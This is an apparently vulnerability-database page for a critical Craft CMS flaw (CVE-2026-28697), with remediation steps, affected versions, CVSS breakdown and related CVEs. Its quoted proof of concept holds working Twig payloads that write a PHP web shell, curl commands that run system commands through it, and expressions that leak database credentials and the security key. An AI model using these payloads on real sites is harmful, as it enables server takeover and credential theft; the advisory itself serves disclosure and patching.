Loading...
Skip to main content

CVE-2026-28697

CRITICAL

Craft CMS Vulnerable to Authenticated RCE via "craft.app.fs.write()" in Twig Templates

Published March 3, 2026Updated March 4, 2026Source: osv

Summary

## Summary An authenticated administrator can achieve Remote Code Execution (RCE) by injecting a Server-Side Template Injection (SSTI) payload into Twig template fields (e.g., Email Templates). By calling the `craft.app.fs.write()` method, an attacker can write a malicious PHP script to a web-accessible directory and subsequently access it via the browser to execute arbitrary system commands. --- ## Proof of Concept ### Attack Prerequisites - Authenticated administrator account with `allowAdminChanges` enabled, or access to the System Messages utility ### Steps to Reproduce 1. Navigate to **Utilities → System Messages** (`/admin/utilities/system-messages`) 2. Edit any email template (e.g., "Test Email") and inject the following in the body (or the Subject): - To exploit it by writing to a file system: - **Note:** Replace the filesystem handle (e.g., `hardDisk`) with a valid handle configured in the target installation. ```twig {{ craft.app.fs.getFilesystemByHandle('hardDisk').write('shell.php', '<?php isset($_GET["c"]) ? system($_GET["c"]) : null; ?>') }} ``` - To exploit it by writing to a volume: - **Note:** Replace the volume handle (e.g., `images`) with a valid handle configured in the target installation. ```twig {{ craft.app.volumes.getVolumeByHandle('images').fs.write('shell.php', '<?php isset($_GET["c"]) ? system($_GET["c"]) : null; ?>') }} ``` <img width="982" height="901" alt="payload-injection" src="https://github.com/user-attachments/assets/86fbb99c-a551-4395-93a1-30e62e77c57e" /> 3. Save & go to **Settings → Email** (`/admin/settings/email`) 4. Click **"Test"** at the bottom of the page to trigger template rendering 5. The webshell is now written to the filesystem/volume. Access it via curl or directly from the browser: **Note:** The path might be different on your end depending on the filesystem or volume configuration. ```bash # For Filesystem curl "http://target.com/uploads/shell.php?c=id" # For Volume curl "http://target.com/uploads/images/shell.php?c=id" # Example Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` <img width="791" height="440" alt="rce-poc" src="https://github.com/user-attachments/assets/6a895609-bea0-459a-9659-0d1437f838f4" /> --- ## Additional Impact The same `craft.app` exposure without any security measures enables additional attack vectors: ### Database Credential Disclosure Database credentials are stored in `.env` outside the webroot and are not accessible to admins through the UI. This bypasses that protection. ```twig {{ craft.app.db.username }} {{ craft.app.db.password }} {{ craft.app.db.dsn }} ``` ### Security Key Disclosure Craft explicitly redacts the security key from phpinfo and error logs, indicating it should be protected. However, `craft.app.config.general.securityKey` bypasses this protection. ```twig {{ craft.app.config.general.securityKey }} ``` ## Recommended Fix - **Add Twig sandbox rules** to block `write`, `writeFileFromStream`, `deleteFile`, and similar destructive methods - **Consider allowlist approach** for `craft.app` properties accessible in templates rather than exposing the entire application ## Resources https://github.com/craftcms/cms/commit/9dc2a4a3ec8e9cd5e8c0d1129f36371437519197 https://github.com/craftcms/cms/pull/18219 https://github.com/craftcms/cms/pull/18216

Remediation

Upgrade to the fixed version using your package manager.

Composer
Update craftcms/cms to 5.9.0-beta.1 or later
composer require "craftcms/cms:^5.9.0-beta.1"
Composer
Update craftcms/cms to 4.17.0-beta.1 or later
composer require "craftcms/cms:^4.17.0-beta.1"

After upgrading, run your dependency scanner again to confirm the vulnerability is resolved.

Affected Packages (2)

PackageEcosystemAffectedFixed In
craftcms/cms
packagist
5.0.0, 5.0.0-RC1, 5.0.1, 5.0.2 (+141 more)5.9.0-beta.1
craftcms/cms
packagist
4.0.0, 4.0.0-RC1, 4.0.0-RC2, 4.0.0-RC3 (+225 more)4.17.0-beta.1

Vulnerability Classification

Common Weakness Enumeration (CWE) identifiers for this vulnerability type.

CVSS Score Breakdown

What the CVSS (Common Vulnerability Scoring System) 9.1 score means for each attack dimension.

Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Confidentiality
Integrity
Availability

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Frequently Asked Questions

What is CVE-2026-28697?
Craft CMS Vulnerable to Authenticated RCE via "craft.app.fs.write()" in Twig Templates This vulnerability has been assigned a severity rating of CRITICAL (CVSS score: 9.1/10).
How do I check if my project is affected by CVE-2026-28697?
CVE-2026-28697 affects craftcms/cms. Use GeekWala's free vulnerability scanner to check your dependencies against CVE-2026-28697 and 200,000+ other known vulnerabilities.

Severity & Exploitability

CVSS Score
9.1

Exploitation is straightforward and causes maximum impact. Patch immediately.

Also Known As

GHSA-v47q-jxvr-p68x

Related CVEs

  • CVE-2024-56145
    CRITICAL

    Craft CMS has potential RCE when PHP `register_argc_argv` config setting is enabled

  • CVE-2023-41892
    CRITICAL

    Craft CMS Remote Code Execution vulnerability

  • CVE-2026-55791
    CRITICAL

    Craft CMS: Blind SSRF and Arbitrary JavaScript Injection via Host Header Poisoning in actionResourceJs

  • CVE-2026-29069
    HIGH

    Craft CMS has unauthenticated activation email trigger with potential user enumeration

  • CVE-2026-25495
    HIGH

    Craft CMS Vulnerable to SQL Injection in Element Indexes via `criteria[orderBy]`

  • CVE-2026-72778
    HIGH

    Craft CMS: Authenticated RCE via `condition.config` JSON cleanse bypass

  • CVE-2026-32267
    HIGH

    Craft CMS Vulnerable to Privilege Escalation/Bypass through UsersController->actionImpersonateWithToken()

  • CVE-2025-68454
    MEDIUM

    Craft CMS vulnerable to potential authenticated Remote Code Execution via Twig SSTI

Check if you're affected

Scan your dependencies to see if this vulnerability affects your projects.

Scan Your Dependencies